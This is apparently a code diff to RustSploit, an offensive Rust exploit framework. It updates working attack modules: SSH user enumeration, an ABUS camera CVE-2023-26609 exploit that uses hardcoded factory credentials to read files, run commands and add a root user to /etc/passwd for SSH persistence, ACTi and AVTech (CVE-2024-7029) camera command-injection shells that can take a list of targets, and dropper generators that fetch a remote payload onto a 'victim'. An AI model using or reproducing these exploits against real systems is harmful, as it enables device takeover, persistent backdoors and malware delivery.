||||
let host = normalize_target(target);
|
||||
println!("{}", format!("[*] Target: {}", host).cyan());
|
||||
|
||||
// Get parameters
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(DEFAULT_SSH_PORT);
|
||||
let samples: usize = prompt_default("Samples per username", "3")?.parse().unwrap_or(DEFAULT_SAMPLES);
|
||||
let timeout: u64 = prompt_default("Connection timeout (seconds)", "10")?.parse().unwrap_or(DEFAULT_TIMEOUT_SECS);
|
||||
let threshold: f64 = prompt_default("Timing threshold (seconds)", "0.3")?.parse().unwrap_or(TIMING_THRESHOLD);
|
||||
|
||||
// Get usernames
|
||||
let mut usernames: Vec<String> = Vec::new();
|
||||
|
||||
if prompt_yes_no("Load usernames from file?", false)? {
|
||||
let file_path = prompt("Username file path")?;
|
||||
if !file_path.is_empty() {
|
||||
match load_usernames(&file_path) {
|
||||
Ok(loaded) => {
|
||||
println!("{}", format!("[*] Loaded {} usernames from file", loaded.len()).cyan());
|
||||
usernames.extend(loaded);
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Failed to load file: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Add default usernames?
|
||||
if usernames.is_empty() || prompt_yes_no("Also test default usernames?", true)? {
|
||||
for user in DEFAULT_USERNAMES {
|
||||
if !usernames.contains(&user.to_string()) {
|
||||
usernames.push(user.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if usernames.is_empty() {
|
||||
return Err(anyhow!("No usernames to test"));
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", format!("[*] Will test {} usernames", usernames.len()).cyan());
|
||||
println!();
|
||||
|
||||
// Run enumeration
|
||||
let valid_users = enumerate_users(&host, port, &usernames, samples, timeout, threshold).await;
|
||||
|
||||
// Save results?
|
||||
if !valid_users.is_empty() && prompt_yes_no("Save valid users to file?", true)? {
|
||||
let output_path = prompt_default("Output file", "valid_ssh_users.txt")?;
|
||||
let mut file = File::create(&output_path)?;
|
||||
writeln!(file, "# Valid SSH users for {}:{}", host, port)?;
|
||||
for user in &valid_users {
|
||||
writeln!(file, "{}", user)?;
|
||||
}
|
||||
println!("{}", format!("[+] Saved to: {}", output_path).green());
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] SSH user enumeration complete".green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -3,16 +3,14 @@
|
||||
// Author: d1g@segfault.net | Ported to Rust for RustSploit
|
||||
// PoC converted 1:1 from Bash to async Rust logic
|
||||
|
||||
// Cargo.toml:
|
||||
// [dependencies]
|
||||
// anyhow = "1.0"
|
||||
// reqwest = { version = "0.11", features = ["blocking", "rustls-tls"] }
|
||||
// md5 = "0.7.0"
|
||||
|
||||
use anyhow::{Result, anyhow};
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use md5;
|
||||
use reqwest::Client;
|
||||
use std::io::{self, Write};
|
||||
use std::time::Duration;
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// Wraps/bracket-sanitizes IPv6 addresses (and leaves IPv4/hostnames alone)
|
||||
fn format_host(raw: &str) -> String {
|
||||
@@ -32,11 +30,20 @@ async fn exploit_lfi(client: &Client, target: &str, filepath: &str) -> Result<()
|
||||
"http://admin:admin@{}/cgi-bin/admin/fileread?READ.filePath={}",
|
||||
host, filepath
|
||||
);
|
||||
println!("[*] Sending LFI request to: {}", url);
|
||||
println!("{}", format!("[*] Sending LFI request to: {}", url).cyan());
|
||||
|
||||
let resp = client.get(&url).send().await?;
|
||||
println!("[+] Status: {}", resp.status());
|
||||
println!("[+] Body:\n{}", resp.text().await?);
|
||||
let status = resp.status();
|
||||
let body = resp.text().await?;
|
||||
|
||||
if status.is_success() {
|
||||
println!("{}", format!("[+] Status: {}", status).green());
|
||||
println!("{}", "[+] Body:".green());
|
||||
println!("{}", body);
|
||||
} else {
|
||||
println!("{}", format!("[-] Status: {}", status).red());
|
||||
println!("{}", format!("[-] Body:\n{}", body).red());
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -47,18 +54,27 @@ async fn exploit_rce(client: &Client, target: &str, cmd: &str) -> Result<()> {
|
||||
"http://manufacture:erutcafunam@{}/cgi-bin/mft/wireless_mft?ap=testname;{}",
|
||||
host, cmd
|
||||
);
|
||||
println!("[*] Sending RCE request to: {}", url);
|
||||
println!("{}", format!("[*] Sending RCE request to: {}", url).cyan());
|
||||
|
||||
let resp = client.get(&url).send().await?;
|
||||
println!("[+] Status: {}", resp.status());
|
||||
println!("[+] Body:\n{}", resp.text().await?);
|
||||
let status = resp.status();
|
||||
let body = resp.text().await?;
|
||||
|
||||
if status.is_success() {
|
||||
println!("{}", format!("[+] Status: {}", status).green());
|
||||
println!("{}", "[+] Body:".green());
|
||||
println!("{}", body);
|
||||
} else {
|
||||
println!("{}", format!("[-] Status: {}", status).red());
|
||||
println!("{}", format!("[-] Body:\n{}", body).red());
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Stage 1: Generate SSH key
|
||||
async fn generate_ssh_key(client: &Client, target: &str) -> Result<()> {
|
||||
let cmd = "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key";
|
||||
println!("[*] Generating SSH key on target...");
|
||||
println!("{}", "[*] Stage 1: Generating SSH key on target...".yellow());
|
||||
exploit_rce(client, target, cmd).await
|
||||
}
|
||||
|
||||
@@ -66,21 +82,21 @@ async fn generate_ssh_key(client: &Client, target: &str) -> Result<()> {
|
||||
async fn inject_root_user(client: &Client, target: &str, password: &str) -> Result<()> {
|
||||
// Compute lowercase-hex MD5 of the provided password
|
||||
let hash = format!("{:x}", md5::compute(password));
|
||||
println!("[*] MD5 hash of password: {}", hash);
|
||||
println!("{}", format!("[*] MD5 hash of password: {}", hash).cyan());
|
||||
|
||||
// Build the echo command to append to /etc/passwd
|
||||
let cmd = format!(
|
||||
"echo%20d1g:{}:0:0:root:/:/bin/sh%20>>%20/etc/passwd",
|
||||
hash
|
||||
);
|
||||
println!("[*] Injecting root user into /etc/passwd...");
|
||||
println!("{}", "[*] Stage 2: Injecting root user into /etc/passwd...".yellow());
|
||||
exploit_rce(client, target, &cmd).await
|
||||
}
|
||||
|
||||
/// Stage 3: Start Dropbear SSH server
|
||||
async fn start_dropbear(client: &Client, target: &str) -> Result<()> {
|
||||
let cmd = "/etc/dropbear/dropbear%20-E%20-F";
|
||||
println!("[*] Starting Dropbear SSH server...");
|
||||
println!("{}", "[*] Stage 3: Starting Dropbear SSH server...".yellow());
|
||||
exploit_rce(client, target, cmd).await
|
||||
}
|
||||
|
||||
@@ -89,40 +105,55 @@ async fn persist_root_shell(client: &Client, target: &str, password: &str) -> Re
|
||||
generate_ssh_key(client, target).await?;
|
||||
inject_root_user(client, target, password).await?;
|
||||
start_dropbear(client, target).await?;
|
||||
println!("[+] Persistence complete! You can now SSH in with:");
|
||||
println!("{}", "[+] Persistence complete! You can now SSH in with:".green().bold());
|
||||
println!(
|
||||
" sshpass -p '{}' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \\
|
||||
-oHostKeyAlgorithms=+ssh-rsa d1g@{}",
|
||||
password, target
|
||||
"{}",
|
||||
format!(
|
||||
" sshpass -p '{}' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \\\n -oHostKeyAlgorithms=+ssh-rsa d1g@{}",
|
||||
password, target
|
||||
).cyan()
|
||||
);
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ ABUS Security Camera TVIP 20000-21150 Exploit ║".cyan());
|
||||
println!("{}", "║ CVE-2023-26609 - LFI, RCE and SSH Root Access ║".cyan());
|
||||
println!("{}", "║ Variant 1 - Multi-mode (LFI/RCE/Persistence) ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
/// Prompt user for mode, and dispatch accordingly
|
||||
async fn execute(target: &str) -> Result<()> {
|
||||
let client = Client::builder()
|
||||
.danger_accept_invalid_certs(true)
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()?;
|
||||
|
||||
println!("[*] Exploit mode selection for target: {}", target);
|
||||
println!(" [1] LFI");
|
||||
println!(" [2] RCE");
|
||||
println!(" [3] SSH Persistence");
|
||||
print!("> ");
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
println!();
|
||||
println!("{}", "[*] Exploit mode selection:".cyan().bold());
|
||||
println!(" {} LFI (Local File Inclusion)", "[1]".green());
|
||||
println!(" {} RCE (Remote Code Execution)", "[2]".green());
|
||||
println!(" {} SSH Persistence (Full Compromise)", "[3]".green());
|
||||
print!("{}", "> ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
|
||||
let mut choice = String::new();
|
||||
io::stdin().read_line(&mut choice)?;
|
||||
match choice.trim() {
|
||||
"1" => {
|
||||
print!("Enter file path to read (e.g. /etc/passwd): ");
|
||||
print!("{}", "Enter file path to read (e.g. /etc/passwd): ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut fp = String::new();
|
||||
io::stdin().read_line(&mut fp)?;
|
||||
exploit_lfi(&client, target, fp.trim()).await?;
|
||||
}
|
||||
"2" => {
|
||||
print!("Enter command to execute (e.g. id): ");
|
||||
print!("{}", "Enter command to execute (e.g. id): ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut cmd = String::new();
|
||||
io::stdin().read_line(&mut cmd)?;
|
||||
@@ -130,7 +161,7 @@ async fn execute(target: &str) -> Result<()> {
|
||||
}
|
||||
"3" => {
|
||||
// Ask for the desired password, hash it, and persist
|
||||
print!("Enter desired password for new root user: ");
|
||||
print!("{}", "Enter desired password for new root user: ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut pwd = String::new();
|
||||
io::stdin().read_line(&mut pwd)?;
|
||||
@@ -140,7 +171,10 @@ async fn execute(target: &str) -> Result<()> {
|
||||
}
|
||||
persist_root_shell(&client, target, pwd).await?;
|
||||
}
|
||||
_ => return Err(anyhow!("Invalid choice")),
|
||||
_ => {
|
||||
println!("{}", "[-] Invalid choice".red());
|
||||
return Err(anyhow!("Invalid choice"));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
@@ -149,5 +183,4 @@ async fn execute(target: &str) -> Result<()> {
|
||||
/// Entry point for the RustSploit dispatch system
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
execute(target).await
|
||||
}
|
||||
|
||||
}
|
||||
@@ -1,7 +1,15 @@
|
||||
// Exploit Title: ABUS Security Camera TVIP 20000-21150 - SSH Root Persistence
|
||||
// CVE: CVE-2023-26609
|
||||
// Variant 2 - Dropbear SSH Persistence with custom username
|
||||
|
||||
use anyhow::Result;
|
||||
use colored::*;
|
||||
use md5;
|
||||
use reqwest::Client;
|
||||
use std::io::{self, Write};
|
||||
use md5;
|
||||
use std::time::Duration;
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// Normalize IPv6 targets, collapsing any number of outer brackets
|
||||
/// and preserving an explicit port if one was given as `[...] : port`.
|
||||
@@ -39,11 +47,20 @@ async fn exploit_rce(client: &Client, target: &str, cmd: &str) -> Result<()> {
|
||||
"http://manufacture:erutcafunam@{}/cgi-bin/mft/wireless_mft?ap=inject;{}",
|
||||
normalized, cmd
|
||||
);
|
||||
println!("[*] Sending RCE payload: {}", cmd);
|
||||
println!("{}", format!("[*] Sending RCE payload: {}", cmd).cyan());
|
||||
|
||||
let resp = client.get(&url).send().await?;
|
||||
println!("[+] Status: {}", resp.status());
|
||||
println!("[+] Response:\n{}", resp.text().await?);
|
||||
let status = resp.status();
|
||||
let body = resp.text().await?;
|
||||
|
||||
if status.is_success() {
|
||||
println!("{}", format!("[+] Status: {}", status).green());
|
||||
println!("{}", "[+] Response:".green());
|
||||
println!("{}", body);
|
||||
} else {
|
||||
println!("{}", format!("[-] Status: {}", status).red());
|
||||
println!("{}", format!("[-] Response:\n{}", body).red());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
@@ -51,7 +68,7 @@ async fn exploit_rce(client: &Client, target: &str, cmd: &str) -> Result<()> {
|
||||
/// Generate Dropbear SSH keys on the target system
|
||||
async fn generate_ssh_key(client: &Client, target: &str) -> Result<()> {
|
||||
let cmd = "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key";
|
||||
println!("[*] Generating Dropbear SSH key...");
|
||||
println!("{}", "[*] Stage 1: Generating Dropbear SSH key...".yellow());
|
||||
exploit_rce(client, target, cmd).await
|
||||
}
|
||||
|
||||
@@ -61,14 +78,14 @@ async fn inject_root_user(client: &Client, target: &str, user: &str, hash: &str)
|
||||
"echo%20{}:{}:0:0:root:/:/bin/sh%20>>%20/etc/passwd",
|
||||
user, hash
|
||||
);
|
||||
println!("[*] Injecting user '{}' with root privileges...", user);
|
||||
println!("{}", format!("[*] Stage 2: Injecting user '{}' with root privileges...", user).yellow());
|
||||
exploit_rce(client, target, &payload).await
|
||||
}
|
||||
|
||||
/// Start Dropbear SSH daemon
|
||||
async fn start_dropbear(client: &Client, target: &str) -> Result<()> {
|
||||
let cmd = "/etc/dropbear/dropbear%20-E%20-F";
|
||||
println!("[*] Starting Dropbear SSH daemon...");
|
||||
println!("{}", "[*] Stage 3: Starting Dropbear SSH daemon...".yellow());
|
||||
exploit_rce(client, target, cmd).await
|
||||
}
|
||||
|
||||
@@ -78,40 +95,66 @@ fn generate_md5_hash(password: &str) -> String {
|
||||
format!("{:x}", digest)
|
||||
}
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ ABUS Security Camera TVIP 20000-21150 Exploit ║".cyan());
|
||||
println!("{}", "║ CVE-2023-26609 - Dropbear SSH Persistence ║".cyan());
|
||||
println!("{}", "║ Variant 2 - Custom Username SSH Root Access ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
/// Main interactive flow: get user/pass, hash it, and inject persistence
|
||||
async fn execute_flow(target: &str) -> Result<()> {
|
||||
let client = Client::builder()
|
||||
.danger_accept_invalid_certs(true)
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()?;
|
||||
|
||||
println!("[*] Dropbear SSH persistence for target: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
println!();
|
||||
|
||||
print!("Enter username to inject: ");
|
||||
print!("{}", "Enter username to inject: ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut user = String::new();
|
||||
io::stdin().read_line(&mut user)?;
|
||||
let user = user.trim();
|
||||
|
||||
print!("Enter password (will be hashed): ");
|
||||
if user.is_empty() {
|
||||
println!("{}", "[-] Username cannot be empty".red());
|
||||
return Err(anyhow::anyhow!("Username cannot be empty"));
|
||||
}
|
||||
|
||||
print!("{}", "Enter password (will be hashed): ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut pass = String::new();
|
||||
io::stdin().read_line(&mut pass)?;
|
||||
let pass = pass.trim();
|
||||
|
||||
if pass.is_empty() {
|
||||
println!("{}", "[-] Password cannot be empty".red());
|
||||
return Err(anyhow::anyhow!("Password cannot be empty"));
|
||||
}
|
||||
|
||||
// Hash it!
|
||||
let hash = generate_md5_hash(pass);
|
||||
println!("[*] Generated MD5 hash: {}", hash);
|
||||
println!("{}", format!("[*] Generated MD5 hash: {}", hash).cyan());
|
||||
println!();
|
||||
|
||||
// Run each step
|
||||
generate_ssh_key(&client, target).await?;
|
||||
inject_root_user(&client, target, user, &hash).await?;
|
||||
start_dropbear(&client, target).await?;
|
||||
|
||||
println!("\n[+] Done. Try connecting with:");
|
||||
println!();
|
||||
println!("{}", "[+] Persistence complete! You can now SSH in with:".green().bold());
|
||||
println!(
|
||||
" sshpass -p '{}' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
|
||||
-oHostKeyAlgorithms=+ssh-rsa {}@{}",
|
||||
pass, user, target
|
||||
"{}",
|
||||
format!(
|
||||
" sshpass -p '{}' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \\\n -oHostKeyAlgorithms=+ssh-rsa {}@{}",
|
||||
pass, user, target
|
||||
).cyan()
|
||||
);
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -1,41 +1,72 @@
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use reqwest::Client;
|
||||
use std::io::{self, Write};
|
||||
use std::time::Duration;
|
||||
|
||||
/// // Executes an RCE on ACTi ACM-5611 Video Camera using command injection
|
||||
/// // Reference:
|
||||
/// // - https://www.exploitalert.com/view-details.html?id=34128
|
||||
/// // - https://packetstormsecurity.com/files/154626/ACTi-ACM-5611-Video-Camera-Remote-Command-Execution.html
|
||||
/// Executes an RCE on ACTi ACM-5611 Video Camera using command injection
|
||||
/// Reference:
|
||||
/// - https://www.exploitalert.com/view-details.html?id=34128
|
||||
/// - https://packetstormsecurity.com/files/154626/ACTi-ACM-5611-Video-Camera-Remote-Command-Execution.html
|
||||
|
||||
/// // Exploit authors:
|
||||
/// // - Todor Donev <todor.donev@gmail.com>
|
||||
/// // - GH0st3rs (RouterSploit module)
|
||||
/// Exploit authors:
|
||||
/// - Todor Donev <todor.donev@gmail.com>
|
||||
/// - GH0st3rs (RouterSploit module)
|
||||
|
||||
const DEFAULT_PORT: u16 = 8080;
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ ACTi ACM-5611 Video Camera RCE Exploit ║".cyan());
|
||||
println!("{}", "║ Command Injection via /cgi-bin/test ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
let port = 8080; // // Default port
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
println!();
|
||||
|
||||
// Prompt for port
|
||||
print!("{}", format!("Enter target port (default {}): ", DEFAULT_PORT).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut port_input = String::new();
|
||||
io::stdin().read_line(&mut port_input)?;
|
||||
let port: u16 = port_input.trim().parse().unwrap_or(DEFAULT_PORT);
|
||||
|
||||
println!("{}", format!("[*] Checking vulnerability on {}:{}...", target, port).yellow());
|
||||
|
||||
if check(target, port).await? {
|
||||
println!("[+] Target seems vulnerable: {}:{}", target, port);
|
||||
println!("{}", format!("[+] Target appears vulnerable: {}:{}", target, port).green().bold());
|
||||
|
||||
// // Simulated shell command execution
|
||||
let cmd = "id"; // // You can change this to any test command
|
||||
// Prompt for command to execute
|
||||
print!("{}", "Enter command to execute (default: id): ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut cmd_input = String::new();
|
||||
io::stdin().read_line(&mut cmd_input)?;
|
||||
let cmd = {
|
||||
let t = cmd_input.trim();
|
||||
if t.is_empty() { "id" } else { t }
|
||||
};
|
||||
|
||||
println!("{}", format!("[*] Executing command: {}", cmd).cyan());
|
||||
let output = execute(target, port, cmd).await?;
|
||||
println!("[+] Executed '{}':\n{}", cmd, output);
|
||||
|
||||
// // You can extend this to implement full shell injection
|
||||
// // shell(arch="armle", method="wget", location="/var/", exec_binary=...)
|
||||
println!("{}", format!("[+] Output:\n{}", output).green());
|
||||
} else {
|
||||
println!("[-] Exploit failed - target {}:{} does not seem vulnerable", target, port);
|
||||
println!("{}", format!("[-] Exploit failed - target {}:{} does not seem vulnerable", target, port).red());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// // Perform a command injection via GET /cgi-bin/test?iperf=;<cmd>
|
||||
/// Perform a command injection via GET /cgi-bin/test?iperf=;<cmd>
|
||||
async fn execute(target: &str, port: u16, cmd: &str) -> Result<String> {
|
||||
let url = format!("http://{}:{}/cgi-bin/test", target, port);
|
||||
let client = Client::builder()
|
||||
.timeout(Duration::from_secs(5))
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.danger_accept_invalid_certs(true)
|
||||
.build()?;
|
||||
|
||||
let res = client
|
||||
@@ -54,22 +85,25 @@ async fn execute(target: &str, port: u16, cmd: &str) -> Result<String> {
|
||||
}
|
||||
}
|
||||
|
||||
/// // Check if the target is running the vulnerable service
|
||||
/// Check if the target is running the vulnerable service
|
||||
async fn check(target: &str, port: u16) -> Result<bool> {
|
||||
let url = format!("http://{}:{}/cgi-bin/test", target, port);
|
||||
let index_url = format!("http://{}:{}/", target, port);
|
||||
let client = Client::builder()
|
||||
.timeout(Duration::from_secs(5))
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.danger_accept_invalid_certs(true)
|
||||
.build()?;
|
||||
|
||||
// // Check /cgi-bin/test
|
||||
// Check /cgi-bin/test
|
||||
let test_res = client.get(&url).send().await?;
|
||||
if test_res.status().is_success() {
|
||||
// // Check root page contains 'Web Configurator'
|
||||
println!("{}", "[*] CGI endpoint accessible".cyan());
|
||||
// Check root page contains 'Web Configurator'
|
||||
let index_res = client.get(&index_url).send().await?;
|
||||
if index_res.status().is_success() {
|
||||
let body = index_res.text().await?;
|
||||
if body.contains("Web Configurator") {
|
||||
println!("{}", "[*] ACTi Web Configurator detected".cyan());
|
||||
return Ok(true);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,10 +1,22 @@
|
||||
use anyhow::Result;
|
||||
use colored::*;
|
||||
use reqwest::Client;
|
||||
use std::io::{self, Write};
|
||||
use std::path::Path;
|
||||
use std::time::Duration;
|
||||
use tokio::io::{AsyncBufReadExt, BufReader};
|
||||
|
||||
const DEFAULT_PORT: &str = "80";
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ AVTech Camera CVE-2024-7029 RCE Exploit ║".cyan());
|
||||
println!("{}", "║ Command Injection via brightness parameter ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
/// // Ensures the target string has a scheme (http://) and includes port
|
||||
fn normalize_url(ip: &str, port: &str) -> String {
|
||||
let with_scheme = if ip.starts_with("http://") || ip.starts_with("https://") {
|
||||
@@ -23,8 +35,9 @@ fn normalize_url(ip: &str, port: &str) -> String {
|
||||
}
|
||||
}
|
||||
|
||||
/// // Check if the device is vulnerable to CVE-2024-7029
|
||||
/// Check if the device is vulnerable to CVE-2024-7029
|
||||
async fn check_vuln(client: &Client, base: &str) -> Result<bool> {
|
||||
println!("{}", "[*] Checking vulnerability...".cyan());
|
||||
let mut url = reqwest::Url::parse(base)?;
|
||||
url.set_path("/cgi-bin/supervisor/Factory.cgi");
|
||||
url.query_pairs_mut()
|
||||
@@ -35,22 +48,27 @@ async fn check_vuln(client: &Client, base: &str) -> Result<bool> {
|
||||
Ok(body.contains("echo_CVE7029"))
|
||||
}
|
||||
|
||||
/// // Interactive shell to send arbitrary commands
|
||||
/// Interactive shell to send arbitrary commands
|
||||
async fn interactive_shell(client: &Client, base: &str) -> Result<()> {
|
||||
let stdin = tokio::io::stdin();
|
||||
let mut lines = BufReader::new(stdin).lines();
|
||||
|
||||
println!("{}", "[+] Interactive shell started. Type 'exit' to quit.".green().bold());
|
||||
loop {
|
||||
print!("cve7029-shell> ");
|
||||
print!("{}", "cve7029-shell> ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
if let Some(cmd) = lines.next_line().await? {
|
||||
let cmd = cmd.trim();
|
||||
if cmd.eq_ignore_ascii_case("exit") {
|
||||
println!("{}", "[*] Exiting shell...".yellow());
|
||||
break;
|
||||
}
|
||||
if cmd.is_empty() {
|
||||
continue;
|
||||
}
|
||||
match exec_cmd(client, base, cmd).await {
|
||||
Ok(out) => println!("{}", out),
|
||||
Err(e) => eprintln!("Error: {}", e),
|
||||
Err(e) => println!("{}", format!("[-] Error: {}", e).red()),
|
||||
}
|
||||
} else {
|
||||
break;
|
||||
@@ -71,44 +89,57 @@ async fn exec_cmd(client: &Client, base: &str, cmd: &str) -> Result<String> {
|
||||
Ok(response.text().await?)
|
||||
}
|
||||
|
||||
/// // Prompt user for a custom port number
|
||||
/// Prompt user for a custom port number
|
||||
fn prompt_port() -> Result<String> {
|
||||
print!("Enter port to use [default: 80]: ");
|
||||
print!("{}", format!("Enter port to use [default: {}]: ", DEFAULT_PORT).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut port = String::new();
|
||||
io::stdin().read_line(&mut port)?;
|
||||
let port = port.trim();
|
||||
Ok(if port.is_empty() { "80".to_string() } else { port.to_string() })
|
||||
Ok(if port.is_empty() { DEFAULT_PORT.to_string() } else { port.to_string() })
|
||||
}
|
||||
|
||||
/// // Entry point required for RouterSploit-inspired dispatch system
|
||||
/// Entry point required for RouterSploit-inspired dispatch system
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
println!();
|
||||
|
||||
let port = prompt_port()?;
|
||||
let client = Client::builder()
|
||||
.danger_accept_invalid_certs(true)
|
||||
.timeout(Duration::from_secs(5))
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()?;
|
||||
|
||||
// // Handle either single IP or file of targets
|
||||
// Handle either single IP or file of targets
|
||||
let targets = if Path::new(target).exists() {
|
||||
println!("{}", format!("[*] Loading targets from file: {}", target).cyan());
|
||||
tokio::fs::read_to_string(target)
|
||||
.await?
|
||||
.lines()
|
||||
.map(str::to_string)
|
||||
.filter(|s| !s.trim().is_empty())
|
||||
.collect::<Vec<_>>()
|
||||
} else {
|
||||
vec![target.to_string()]
|
||||
};
|
||||
|
||||
println!("{}", format!("[*] Testing {} target(s)...", targets.len()).cyan());
|
||||
println!();
|
||||
|
||||
for raw_ip in &targets {
|
||||
let url = normalize_url(raw_ip, &port);
|
||||
println!("{}", format!("[*] Testing: {}", url).yellow());
|
||||
|
||||
if check_vuln(&client, &url).await? {
|
||||
println!("[+] {} is vulnerable!", url);
|
||||
println!("{}", format!("[+] {} is VULNERABLE!", url).green().bold());
|
||||
interactive_shell(&client, &url).await?;
|
||||
} else {
|
||||
println!("[-] {} is not vulnerable", url);
|
||||
println!("{}", format!("[-] {} is not vulnerable", url).red());
|
||||
}
|
||||
println!();
|
||||
}
|
||||
|
||||
println!("{}", "[*] Scan complete.".cyan());
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -18,3 +18,4 @@ pub mod roundcube;
|
||||
pub mod flowise;
|
||||
pub mod http2;
|
||||
pub mod jenkins;
|
||||
pub mod react;
|
||||
|
||||
@@ -130,7 +130,8 @@ exit
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub async fn run(_target: &str) -> Result<()> {
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("{}", format!("[*] Target context: {}", if target.is_empty() { "local" } else { target }).dimmed());
|
||||
let stage1_name = prompt("[+] Output BAT filename (stage 1): ")?;
|
||||
let github_url = prompt("[+] GitHub raw URL of PowerShell script: ")?;
|
||||
let ps1_output = prompt("[+] Name to save .ps1 as on victim: ")?;
|
||||
|
||||
@@ -300,8 +300,11 @@ fn prompt(msg: &str, default: Option<&str>) -> String {
|
||||
}
|
||||
|
||||
/// // == RouterSploit-style async entry point ==
|
||||
pub async fn run(_target: &str) -> Result<()> {
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
print_welcome_naruto();
|
||||
// Display target context if provided
|
||||
let target_display = if target.is_empty() { "local" } else { target };
|
||||
println!("{}", format!("[*] Target context: {}", target_display).dimmed());
|
||||
let url_exe = prompt("URL of PowerShell payload (EXE, will be saved as .ps1)", Some("https://yourdomain.com/payload.exe"));
|
||||
let out_name = prompt("Final output batch filename", Some("3stage_dropper.bat"));
|
||||
let ps1_name = prompt("Name to save downloaded EXE as (with .ps1 extension)", Some("payload.ps1"));
|
||||
|
||||
@@ -0,0 +1,2 @@
|
||||
pub mod react2shell;
|
||||
|
||||
@@ -0,0 +1,965 @@
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use base64::{engine::general_purpose::STANDARD as BASE64_STANDARD, Engine as _};
|
||||
use regex::Regex;
|
||||
use reqwest::Client;
|
||||
use std::io::{self, Write};
|
||||
use std::time::Duration;
|
||||
use tokio::io::{AsyncBufReadExt, BufReader};
|
||||
use rand::prelude::*;
|
||||
use rand::rng;
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 30;
|
||||
const BOUNDARY: &str = "------WebKitFormBoundaryx8jO2oVc6SWP3Sad"; // 6 dashes for body
|
||||
const BOUNDARY_HEADER: &str = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"; // 4 dashes for Content-Type header
|
||||
|
||||
const BANNER: &str = r#"
|
||||
╔══════════════════════════════════════════════════════════════════════╗
|
||||
║ ║
|
||||
